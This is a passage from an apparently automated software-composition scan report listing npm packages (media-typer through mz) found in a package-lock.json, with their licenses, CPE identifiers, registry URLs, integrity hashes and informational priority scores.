integrity: sha512-aa5tG6sDoK+k70B9iEX1NeyfT8ObCKhNDs6lJVpwF6r8vhUfuKMslIcirq6HIUYuuUYLefcEQOn9bSBOvawtwg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6ecc4376357a6aa5
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: media-typer 0.3.0'
title: media-typer 0.3.0
description: 'Package discovered: media-typer 0.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d88fe6586764efc9
name: media-typer
version: 0.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:media-typer:media-typer:0.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:media-typer:media_typer:0.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:media_typer:media-typer:0.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:media_typer:media_typer:0.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:media:media-typer:0.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:media:media_typer:0.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/media-typer@0.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz
integrity: sha512-dq+qelQ9akHpcOl/gUVRTxVIOkAJ1wR3QAvb4RsVjS8oVoFjDGTc679wJYmUmknUF5HwMLOgb5O+a3KxfWapPQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d32acd7a2e9bf402
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: merge-descriptors 1.0.3'
title: merge-descriptors 1.0.3
description: 'Package discovered: merge-descriptors 1.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 670d71ff9d8ed75e
name: merge-descriptors
version: 1.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:merge-descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:merge-descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:merge_descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:merge_descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:merge:merge-descriptors:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:merge:merge_descriptors:1.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/merge-descriptors@1.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz
integrity: sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b81185034826e168
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: merge2 1.4.1'
title: merge2 1.4.1
description: 'Package discovered: merge2 1.4.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 49cc3c07a1505404
name: merge2
version: 1.4.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:merge2:merge2:1.4.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/merge2@1.4.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz
integrity: sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b23a5664e0d696ec
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: methods 1.1.2'
title: methods 1.1.2
description: 'Package discovered: methods 1.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a17abee1ae67ac79
name: methods
version: 1.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:methods:methods:1.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/methods@1.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/methods/-/methods-1.1.2.tgz
integrity: sha512-iclAHeNqNm68zFtnZ0e+1L2yUIdvzNoauKU4WBA3VvH/vPFieF7qfRlwUZU+DA9P9bPXIS90ulxoUoCH23sV2w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e5492a26182452ae
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: micromatch 4.0.8'
title: micromatch 4.0.8
description: 'Package discovered: micromatch 4.0.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: dc31731ddf283ca7
name: micromatch
version: 4.0.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:jonschlinkert:micromatch:4.0.8:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/micromatch@4.0.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz
integrity: sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==
dependencies:
braces: ^3.0.3
picomatch: ^2.3.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: cdd82acabfa8e9e8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: mime 1.6.0'
title: mime 1.6.0
description: 'Package discovered: mime 1.6.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 10b23cab35239c6d
name: mime
version: 1.6.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:mime_project:mime:1.6.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/mime@1.6.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/mime/-/mime-1.6.0.tgz
integrity: sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a724fe9397f99c40
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: mime 3.0.0'
title: mime 3.0.0
description: 'Package discovered: mime 3.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 438a12c55a1c15bf
name: mime
version: 3.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:mime_project:mime:3.0.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/mime@3.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/mime/-/mime-3.0.0.tgz
integrity: sha512-jSCU7/VB1loIWBZe14aEYHU/+1UMEHoaO7qxCOVJOw9GgH72VAWppxNcjU+x9a2k3GSIBXNKxXQFqRvvZ7vr3A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1454de8382f97ba2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: mime-db 1.52.0'
title: mime-db 1.52.0
description: 'Package discovered: mime-db 1.52.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e010d1b3c9ab0c02
name: mime-db
version: 1.52.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:mime-db:mime-db:1.52.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:mime-db:mime_db:1.52.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:mime_db:mime-db:1.52.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:mime_db:mime_db:1.52.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:mime:mime-db:1.52.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:mime:mime_db:1.52.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/mime-db@1.52.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz
integrity: sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c62c037f2c05a588
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: mime-types 2.1.35'
title: mime-types 2.1.35
description: 'Package discovered: mime-types 2.1.35'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d035c2d2cba76761
name: mime-types
version: 2.1.35
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:mime-types:mime-types:2.1.35:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:mime-types:mime_types:2.1.35:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:mime_types:mime-types:2.1.35:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:mime_types:mime_types:2.1.35:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:mime:mime-types:2.1.35:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:mime:mime_types:2.1.35:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/mime-types@2.1.35
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz
integrity: sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==
dependencies:
mime-db: 1.52.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 39275c688371843a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: minimatch 9.0.9'
title: minimatch 9.0.9
description: 'Package discovered: minimatch 9.0.9'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: dadb042585b0fc99
name: minimatch
version: 9.0.9
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:minimatch_project:minimatch:9.0.9:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/minimatch@9.0.9
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz
integrity: sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==
dependencies:
brace-expansion: ^2.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fe3ea9bf939aec06
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: minimist 1.2.8'
title: minimist 1.2.8
description: 'Package discovered: minimist 1.2.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bf8bc4c7577fa757
name: minimist
version: 1.2.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:minimist:minimist:1.2.8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/minimist@1.2.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz
integrity: sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 43d359d2fd9254cd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: minipass 7.1.3'
title: minipass 7.1.3
description: 'Package discovered: minipass 7.1.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a4e62963fcdf0651
name: minipass
version: 7.1.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BlueOak-1.0.0
spdxExpression: BlueOak-1.0.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:minipass:minipass:7.1.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/minipass@7.1.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz
integrity: sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 371d68f8a3e92216
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: mkdirp 0.5.6'
title: mkdirp 0.5.6
description: 'Package discovered: mkdirp 0.5.6'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4ee017b1ce1fca30
name: mkdirp
version: 0.5.6
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:mkdirp:mkdirp:0.5.6:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/mkdirp@0.5.6
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz
integrity: sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==
dependencies:
minimist: ^1.2.6
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 85ab0a570b2a1b2d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: morgan 1.10.1'
title: morgan 1.10.1
description: 'Package discovered: morgan 1.10.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0b0e2e978d7d93f4
name: morgan
version: 1.10.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:morgan_project:morgan:1.10.1:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/morgan@1.10.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/morgan/-/morgan-1.10.1.tgz
integrity: sha512-223dMRJtI/l25dJKWpgij2cMtywuG/WiUKXdvwfbhGKBhy1puASqXwFzmWZ7+K73vUPoR7SS2Qz2cI/g9MKw0A==
dependencies:
basic-auth: ~2.0.1
debug: 2.6.9
depd: ~2.0.0
on-finished: ~2.3.0
on-headers: ~1.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 19152fd7179a58f9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ms 2.0.0'
title: ms 2.0.0
description: 'Package discovered: ms 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 46f1aa86e531772d
name: ms
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:vercel:ms:2.0.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/ms@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ms/-/ms-2.0.0.tgz
integrity: sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c6acafac62af1ee0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ms 2.1.3'
title: ms 2.1.3
description: 'Package discovered: ms 2.1.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bb1077662b3cb7e0
name: ms
version: 2.1.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:vercel:ms:2.1.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/ms@2.1.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ms/-/ms-2.1.3.tgz
integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ffedfc57a9f39743
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: multer 1.4.5-lts.2'
title: multer 1.4.5-lts.2
description: 'Package discovered: multer 1.4.5-lts.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 775c553ab4f0a485
name: multer
version: 1.4.5-lts.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/multer@1.4.5-lts.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/multer/-/multer-1.4.5-lts.2.tgz
integrity: sha512-VzGiVigcG9zUAoCNU+xShztrlr1auZOlurXynNvO9GiWD1/mTBbUljOKY+qMeazBqXgRnjzeEgJI/wyjJUHg9A==
dependencies:
append-field: ^1.0.0
busboy: ^1.0.0
concat-stream: ^1.5.2
mkdirp: ^0.5.4
object-assign: ^4.1.1
type-is: ^1.6.4
xtend: ^4.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9d7c97f3f3cb9ec0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: mz 2.7.0'
title: mz 2.7.0
description: 'Package discovered: mz 2.7.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 96c78782a0a6a6e8
name: mz
version: 2.7.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:mz:mz:2.7.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/mz@2.7.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/mz/-/mz-2.7.0.tgz
